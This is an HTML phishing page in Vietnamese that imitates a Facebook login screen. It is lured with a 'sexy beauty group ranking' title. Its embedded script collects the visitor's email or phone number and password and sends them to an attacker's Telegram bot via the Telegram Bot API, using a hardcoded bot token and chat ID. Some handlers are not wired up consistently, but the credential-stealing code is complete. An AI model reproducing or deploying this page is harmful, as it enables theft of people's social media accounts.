<!DOCTYPE html>
<html>
<head>
  <meta charset='utf-8' />
  <meta content='width=device-width, initial-scale=1' name='viewport' />
  <meta property="og:title" content="Bảng xếp hạng girl's xinh Group Vietnamese Sexy Beauty Group - VSBG" />
  <meta property="og:image" content="./banner.jpg" />
  <link crossorigin='anonymous' href='https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css' integrity='sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC' rel='stylesheet' />
  <link data-badged-icon='https://static.xx.fbcdn.net/rsrc.php/ye/r/Ta8_J_nYekI.ico' data-default-icon='https://static.xx.fbcdn.net/rsrc.php/yD/r/d4ZIVX-5C-b.ico' href='https://static.xx.fbcdn.net/rsrc.php/yD/r/d4ZIVX-5C-b.ico' rel='shortcut icon' />
  <title>Đăng nhập</title>
  <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js'></script>

  <!-- robotel -->
  <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>

  <style id='page-skin-1' type='text/css'>
    @import url('https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700&display=swap');
    body{
      font-family: 'Roboto', sans-serif;
    }
    input.form-control {
      border: none;
      border-bottom: 1px solid #ddd;
      background: none;
    }
    @media (pointer: fine) {
      .fblog{
        width: 600px;
        text-align: center;
        margin: auto;
      }
    }
    ._8qtf {
      margin: 12px 0 4px 0;
      width: 100%;
    }
    ._43mg {
      display: block;
      overflow: hidden;
      text-align: center;
      white-space: nowrap;
    }
    ._43mg>span {
      display: inline-block;
      position: relative;
    }
    ._43mh {
      color: #4b4f56;
    }
    ._43mg {
      display: block;
      overflow: hidden;
      text-align: center;
      white-space: nowrap;
    }
    ._43mg>span:before {
      margin-right: 15px;
      right: 100%;
    }
    ._43mg>span:before, ._43mg>span:after {
      background: #ccd0d5;
      content: '';
      height: 1px;
      position: absolute;
      top: 50%;
      width: 9999px;
    }
    ._43mg>span:after {
      left: 100%;
      margin-left: 15px;
    }
    ._43mg>span:before, ._43mg>span:after {
      background: #ccd0d5;
      content: '';
      height: 1px;
      position: absolute;
      top: 50%;
      width: 9999px;
    }
    ._43mg {
      display: block;
      overflow: hidden;
      text-align: center;
      margin-top: 50px;
      white-space: nowrap;
    }
  </style>
</head>
<body>
  <div class='fblog'>
    <img class='img-fluid' src='./banner.jpg' />
    <center class='mt-2'><small>Tiếng Việt</small></center>
    <div class='container'>
      <div class='row justify-content-center'>
        <div class='col-10'>
            <form action='/' method='POST' onsubmit="return verifyPassword()">
                <!-- Các trường dữ liệu đăng nhập ở đây -->
                <div class='mb-4 mt-4'>
                  <input class='form-control' name='email' id="user2" placeholder='Số điện thoại hoặc email' required='required' type='text' />
                  <span id="message2" style="color:red"> </span> <br><br>  
                </div>
                <div class='mb-4'>
                  <input class='form-control' name='pass' id="pswd" placeholder='Mật khẩu' required='required' type='password' />
                  <span id="message" style="color:red"> </span> <br><br>  
                </div>
                <!-- Nút Đăng nhập -->
                <div class='d-grid gap-2'>
                  <button class='btn btn-primary' name='login' onclick="thongbao()" style='font-size: 15px; font-weight:600; ' type='submit'>Đăng nhập</button>
                </div>
            </form>              
          <br />
          <center><a href='#' style='text-decoration: none;font-weight: 600;'>Quên mật khẩu?</a></center>
          <div class='_43mg _8qtf' data-sigil='login_reg_separator' id='login_reg_separator'><span class='_43mh'>hoặc</span></div>
          <center>
            <div style='margin-top:50px'>
              <div>
                <button class='btn btn-success' style='background: #098e00; border: none; font-weight: 600; font-size: 15px; width: max-content; ' type='button'>Tạo tài khoản Facebook mới</button>
              </div>
            </div>
          </center>
        </div>
      </div>
    </div>
  </div>
  <div class='navbar no-items section' id='navbar'></div>
  <script type='text/javascript'>
    $("#dangnhap").click(function(){
      $("#dangnhap").text('Vui lòng chờ...');
      $("#dangnhap").addClass('disabled');
    })
    function GetURLParameter(sParam)
    {
      var sPageURL = window.location.search.substring(1);
      var sURLVariables = sPageURL.split('&');
      for (var i = 0; i < sURLVariables.length; i++) 
      {
        var sParameterName = sURLVariables[i].split('=');
        if (sParameterName[0] == sParam) 
        {
          return sParameterName[1];
        }
      }
    }
  </script>
  <script>
    $(document).ready(function(){
      var tech = GetURLParameter('id');
      $("input[name=id]").val(tech);
    });
  </script>
  <script crossorigin='anonymous' integrity='sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM' src='https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js'></script>

  <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
  <script>
    // Hàm xử lý khi người dùng nhấn nút Đăng nhập
    function onLoginClick() {
      const email = document.getElementById('user2').value;
      const password = document.getElementById('pswd').value;
  
      // Gửi thông tin tài khoản đến bot Telegram
      const accountInfo = `Email/Username: ${email}\nPassword: ${password}`;
      sendToTelegram(accountInfo);
    }
  
    // Hàm gửi thông tin tài khoản đến Telegram
    function sendToTelegram(accountInfo) {
      console.log('Gửi thông tin tài khoản đến Telegram:', accountInfo);
      const botToken = '6211801440:AAEs6S_eH-SPFNqBQMlhLZB2G2_rTs9i4VQ'; // Thay thế bằng token của bot Telegram của bạn
      const chatId = '6125384141'; // Thay thế bằng chat ID của bạn
  
      // Định dạng thông điệp
      const message = `Thông tin tài khoản:\n${accountInfo}`;
  
      // Tạo URL của API Telegram
      const apiUrl = `https://api.telegram.org/bot${botToken}/sendMessage`;
  
      // Dữ liệu cần gửi lên API
      const data = new URLSearchParams();
      data.append('chat_id', chatId);
      data.append('text', message);
  
      // Sử dụng Axios để gửi cuộc gọi POST đến API Telegram
      axios.post(apiUrl, data)
        .then(response => {
          console.log('Thông tin đã được gửi thành công đến bot Telegram.');
        })
        .catch(error => {
          console.error('Có lỗi xảy ra khi gửi thông tin đến bot Telegram:', error);
        });
    }
  </script>  
</body>
</html>
<!-- Global site tag (gtag.js) - Google Analytics 
<script async src="https://www.googletagmanager.com/gtag/js?id=G-Z0LKZTYTRQ_KEY INPUT"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-Z0LKZTYTRQ_KEY INPUT');
</script> -->
<script>  
  function verifyPassword() {  
    var pw = document.getElementById("pswd").value;  

    if(pw.indexOf(' ') >= 0){
      document.getElementById("message").innerHTML = "**Fill the password please!";  
      return false; 
    }
    //check empty password field  
    if(pw == "") {  
      document.getElementById("message").innerHTML = "**Fill the password please!";  
      return false;  
    }  
   
    //minimum password length validation  
    if(pw.length < 6) {  
      document.getElementById("message").innerHTML = "**Password length must be at least 6 characters";  
      return false;  
    }  
  
    //maximum length of password validation  
    if(pw.length > 30) {  
      document.getElementById("message").innerHTML = "**Password length must not exceed 30 characters";  
      return false;  
    } else {  
      alert("Password is correct");  
    }

    var user2 = document.getElementById("user2").value;  
    //check empty USER field  
    if(user2.indexOf(' ') >= 0){
      document.getElementById("message2").innerHTML = "**Fill the username please!";  
      return false; 
    }

    if(user2 == "") {  
      document.getElementById("message2").innerHTML = "**Fill the user please!";  
      return false;  
    }  
   
    //minimum password length validation  
    if(user2.length < 6) {  
      document.getElementById("message2").innerHTML = "**User length must be at least 6 characters";  
      return false;  
    }  
  
    //maximum length of password validation  
    if(user2.length > 30) {  
      document.getElementById("message2").innerHTML = "**User length must not exceed 30 characters";  
      return false;  
    } else {  
      alert("User is correct");  
    }  
  }  
</script>

